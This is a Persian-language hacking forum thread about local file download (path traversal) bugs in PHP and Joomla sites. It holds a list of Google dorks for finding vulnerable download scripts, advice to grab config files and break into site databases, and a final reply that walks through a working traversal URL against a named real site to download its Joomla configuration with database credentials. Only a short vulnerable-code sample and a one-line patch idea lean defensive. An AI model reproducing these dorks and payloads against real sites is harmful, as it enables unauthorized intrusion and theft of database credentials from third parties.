رفتن به مطلب
انجمن تیم امنیتی گارد ایران

ارسال های توصیه شده

سلام

درباره باگ lfd میگید که چطوری ممکنه یک سایت این باگ روداشته باشه و بهش نفوذ کرد؟

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

سلام.

ابتدا دورک رو خدمتتون بدم بعد توضیحات رو بگم.

inurl:"download.php?file=" 
inurl:"download.php?src=" 
inurl:"download.php?url=" 
inurl:"download.php?f=" 
inurl:"download.php?book_file=" 
inurl:"download.php?di_key=" 
inurl:"download.php?path=" 
inurl:"download.php?dfile=" 
inurl:"download.php?get=" 
inurl:"download.php?u=" 
inurl:"dl.php?file=" 
inurl:"down.php?dd=" 
inurl:"down.php?name=" 
inurl:"down.php?downfile" 
inurl:"down.php?arq=" 
inurl:"file.php?src=" 
inurl:"download.php?downloadFile" 
inurl:"download.php?page="  

دلیل به وجود آمدن این باگ فقط و فقط عدم امن سازی فایل کانفی گ هست و هکر میتونه با استفاده از دستورات و کامند های مختلف به کانفیگ دسترسی داشته باشه.

برای پچ این باگ منبع معتبر چه ایرانی و چه خارجی دیده نشد.

موفق باشید

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

ممنون بیشتر توضیح میدید

 چطوری توی سایت باید دنبال کانفیگ بود.

مثلا توی مسابقه ۵ با باگ  lfd شما اکسپلویت استفاده کردید برای دانلود کانفیگ

و همیشه یک نوع اکسپلویت نیست و بعضی از جاها دیدم بطور دیگه ی دنبال lfd میگردن

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

خوب ببینید.

مثلا من دورک اول رو در گوگل سرچ میکنم.

تارگتی رو انتخاب میکنم.به فرض مثال تارگت ما آسیب پذیر هست.

معمولا سایت هایی که این باگ رو دارن دایررکتوری index.php رو دانلود میکنن.

در اکثر مواقع لینک کانفیگ سایت در این فایل وجود داره.

کافینگ رو که دانلود کردین با استفاده از اسکریپت های mysql به دیتابیس وصل میشین و سایت رو هک میکنین.

باگ ساده ای هست ولی نیاز به کمی دقت داره.

موفق باشید

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

سلام

 

باگ lfd وقتی که Cms یا ... میاد و ادرس یک فایل رو میگیره و اون رو بدون هیچ گونه چکی فایل رو دانلود می کنه این باگ رخ میده مثله قطعه کد زیر : 

<?php header("Content-Type: application/octet-stream");


$file = $_GET["file"];
header("Content-Disposition: attachment; filename=" . urlencode($file));   
header("Content-Type: application/octet-stream");
header("Content-Type: application/download");
header("Content-Description: File Transfer");            
header("Content-Length: " . filesize($file));
flush();
$fp = fopen($file, "r");
while (!feof($fp))
{
    echo fread($fp, 99999);
    flush(); 
} 
fclose($fp); 
?>

مثلا ادرس اینطوری میشه 

http://myWeb.com/download.php?file="about.pdf"

خب حالا میبینیم اینجا بدون هیچ گونه چک شدنی میاد و فایلو دانلود میکنه حالا اگر نفوذگر بیاد و درخواست دانلود فایل کانفیگ سایت رو بده دیگه تمام راحت در اختیارش قرار میگیره و میتونه

 

نفوذش رو به راحتی به سایت شما انجام بده

 

روش هاییم که به ذهنم میرسه یکی مثل باگ قبل بیایم و کل فایل های دانلودی رو تو ی آرایه بزاریم بعد چک کنیم یا بیایم و دایرکتوری دانلود رو اسکن کنیم اگر فایل موجود بود دانلود بشه در

 

غیر اینصورت دانلود نشه

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

اگه امکان داره دوستان یک فیلم آموزشی درباره پیداکردن باگ در یک سایت آسیب پذیر آماده کنند با صدا که گویا همه چیز باشه

 

چون اکثر فیلم ها فقط میان یک چیزی به آخر تارگت اضافه میکنند بعد یک فایل دانلود میشه .!

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

اساتید دوستان کسی میتونه یک تارگت قرار بده و درباره باگ lfd توش توضیح بده

بگه که کجا باگ رخ داده و چطوری میشه فایل رو ازش دانلود کرد

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

تارگت : 


http://thanhhoaedu.vn/ 

خب صفحه کامپوننت اسیب پذیر jetext در این سایت رو میتونید ببینید و خب و اینطوری از این کاپوننت اسیب پذیر فایل دانلود کنیم

http://thanhhoaedu.vn//index.php?option=com_jetext&task=download&file=[File Name]

خب حالا شما هر پیچو که بخوای میتونی دانلود کنی چون هیچ چک کردنی در این کامپوننت دیده نمی شه خب کدش هم تقریبا مثل کد اسیب پذیر بالاست که گذاشتم حالا ما فایل کانفیگ که حاوی یوزر و پس دیتابیس سایت هست رو در میاریم

چون این رو از یکی از اکسپلویت های سایت cxsecurity.com کپی کردم و میدونم که cms جوملا هست پس فایل کانفیگشم اینه configuration.php خب اما چون ما دایروکتوری در حال کار این کامپوننت اینجاست

/home/thanhhoa/public_html/components/com_jetext/

ی چیز الکی بزنید ارور میده و نشون میده :

Warning: fclose() expects parameter 1 to be resource, boolean given in /home/thanhhoa/public_html/components/com_jetext/controller.php on line 95

چون اخرش با fclose میخواسته فایل دانلودیی که بازش کرده رو ببنده تا سرور شلوغ نشه و حالا نمی تونه ببنده و حتی از or die استفاده نکرده این ارور که حاوی اطلاعات قشنگی از جمله دایروکتوریی که اسکریپت در حال اجرا شدن هست رو هم برای شما نشون میده(ارور دیفالت کامپایلر )

 

اینا ها اینم دایروکتوریی که اسکریپت درش در حال کاره

/home/thanhhoa/public_html/components/com_jetext/controller.php 

و فایل

configuration.php در دایروکتوری جوملا(دایروکتوری که جوملا توش نصب شده) یعنی

/home/thanhhoa/public_html/

پس ما میخوایم از این دایروکتوری که اسکریپت درش اجرا هست بیایم عقب باید به جای /components/com_jetext/ به جای کلمات com_jetext و components کلمه .. رو بزاریم .. در لینوکس و ویندوز به معنی عقب اومدن هست اگه تو cmd ویندوزتون هم بزنید cd ../.. 2 دایروکتوری میاد عقب بعد اگه بزنید dir میبینید که لیست فایل های موجود در دو دایرکتوری قبل رو میده

خب حالا فقط کافیه بزنیم

http://thanhhoaedu.vn//index.php?option=com_jetext&task=download&file=../../configuration.php

و فایل کانفیگ شروع به دانلود میشه بعد کافیه بازش کنید و اطلاعات دیتابیس رو ببینید :)

 

ساده تر از این دیگه نمی تونستم توضیح بدم امیدوارم مفید بوده باشه :)

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...